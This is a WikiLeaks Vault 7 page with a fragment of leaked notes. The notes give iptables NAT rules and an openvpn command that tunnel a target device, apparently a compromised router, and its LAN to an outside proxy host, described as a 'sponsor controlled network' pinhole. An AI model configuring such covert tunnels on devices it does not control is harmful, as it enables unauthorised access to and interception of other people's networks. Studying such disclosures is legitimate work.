Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

route add -net 192.168.1.0 netmask 255.255.255.0 gw 10.129.129.1
#requires mapping on FT or support for iptables NETMAP target
#route add -net 10.1.2.0 netmask 255.255.255.0 gw 10.129.129.1
6. On the FT:
insmod /usr/sbin/tun.o
iptables -t nat -I POSTROUTING 1 -o tun0 -j MASQUERADE
#setup virtual net IP for forward pinhole
iptables -t nat -I POSTROUTING 1 -s 10.129.66.1 -j MASQUERADE
#make sure the traffic from the tunnel isn't dropped
iptables -t filter -I FORWARD 1 -s 10.129.66.1 -d 192.168.1.0/24
-j ACCEPT
#access to FT services from VPN
iptables -t filter -I INPUT 1 -s 10.129.66.1 -j ACCEPT
openvpn --proto tcp-client --remote 5.4.16.104 8080 --dev tun0
--ifconfig 10.129.129.1 10.129.66.1 --verb 5 --ping 30 &
#note: ping both IP(s) to confirm the tunnel is up
# once you exit the telnet session, the tunnel goes down, but
the process on the FT should still be ok. Restart the openvpn
server
#setup the DNAT translation for the forward pinhole
# not required if adding a 192.168.1.0/24 route on the proxy
server
#iptables -t nat -A PREROUTING -d 10.1.2.128 -j DNAT --to
192.168.1.128
#more ideal:
#iptables -t nat -A PREROUTING -d 10.1.2.0/24 -j NETMAP –to
192.168.1.0/24
Demo
Explain the use case sceanario and our current solution:
- A vpn tunnel to route/proxy traffic through a sponsor controlled network
Proxy Tunnel Uses
1. proxy target traffic
2. provide forward pinhole from proxy server.
a routable virtual IP address for the FT and virtual subnet for the FT's LAN on the proxy server
3. provides a routable virtual IP or port to FT from the proxy server (in the case where the FT does

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh